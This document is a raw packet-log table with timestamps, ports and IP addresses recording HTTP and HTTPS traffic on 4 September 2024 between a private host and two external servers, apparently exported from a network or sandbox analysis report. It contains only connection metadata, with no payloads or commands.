Sep 4, 2024 17:37:08.226165056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226181984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226182938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226192951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226203918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226203918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226214886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226224899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226228952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226237059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226237059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226248980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226262093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226264000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226288080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226305008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226481915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226494074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226521015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226624966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226636887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226646900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226658106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226669073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226670027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226680040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226686001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226701021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226707935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226712942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226722956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226727962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226733923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226746082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226746082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226756096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226767063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226773977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226780891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226789951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226793051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226804972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226804972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226819038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226829052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226829052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226840973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226851940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226855040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226864100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226871014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226891994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226913929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.302062988 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.302076101 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.302222967 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.302232981 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.302277088 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.302629948 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.302644968 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.302695990 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.302704096 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.302738905 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.303484917 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.303499937 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.303553104 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.303560019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.303596973 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.304214001 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.304230928 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.304291010 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.304299116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.304332018 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.304745913 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.304759979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.304811954 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.304819107 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.304852962 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.305176973 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.305190086 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.305239916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305243015 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.305249929 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.305260897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305265903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305277109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.305310011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.305310011 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.305380106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305389881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305399895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305414915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305423975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.305428982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.305440903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.305459976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.305469036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.305921078 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.305938959 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.305974007 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.305979967 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.305991888 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.306022882 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.306416035 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.306431055 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.306468964 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.306476116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.306510925 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.309461117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309511900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.309616089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309626102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309649944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.309662104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.309715033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309726000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309735060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309750080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.309751034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.309758902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.309777021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.309784889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310121059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310131073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310142040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310152054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310161114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310170889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310180902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310180902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310180902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310192108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310201883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310205936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310218096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310220957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310233116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310240984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310245037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310251951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310254097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310262918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310276031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310278893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310287952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310300112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310308933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310333967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310359001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310369015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310378075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310388088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310399055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310400009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310417891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310437918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310566902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310576916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310590982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310600042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310607910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310610056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310621977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310630083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310631990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310642958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310643911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310678959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310722113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310731888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310762882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310784101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310854912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310866117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310878992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310889959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310898066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310899019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310909986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310919046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310920000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310930014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310930014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310942888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310954094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310955048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310966969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.310977936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.310988903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311012983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311054945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311065912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311095953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311173916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311184883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311193943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311204910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311214924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311217070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311227083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311227083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311238050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311248064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311253071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311265945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311283112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311372995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311383009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311392069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311402082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311417103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311436892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311477900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311492920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311506987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311516047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311520100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311537981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311546087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311624050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311635971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311644077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311652899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311664104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311667919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311677933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311688900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311690092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311700106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311716080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311742067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311907053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311918974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311927080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311945915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311954021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311955929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311965942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311973095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311976910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311986923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.311994076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.311996937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.312002897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.312009096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.312020063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.312022924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.312031031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.312041998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.312046051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.312052965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.312067032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.312078953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.312100887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316207886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316220045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316229105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316257000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316279888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316307068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316318989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316328049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316339970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316349983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316369057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316390038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316495895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316504955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316514015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316524982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316534042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316541910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316557884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316570044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316576958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316617966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316728115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316739082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316747904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316773891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316791058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316864014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316874027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316883087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316891909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316901922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316907883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316912889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316922903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.316927910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316946030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.316946030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317011118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317023039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317032099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317054033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317068100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317073107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317080021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317089081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317099094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317109108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317115068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317120075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317140102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317146063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317548990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317559004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317568064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317578077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317588091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317588091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317599058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317608118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317612886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317616940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317620993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317630053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317640066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317646027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317658901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317666054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317670107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317682028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317691088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317696095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317702055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317712069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317719936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317729950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317733049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317733049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317739964 CEST	80	49719	147.45.44.104	192.168.2.6
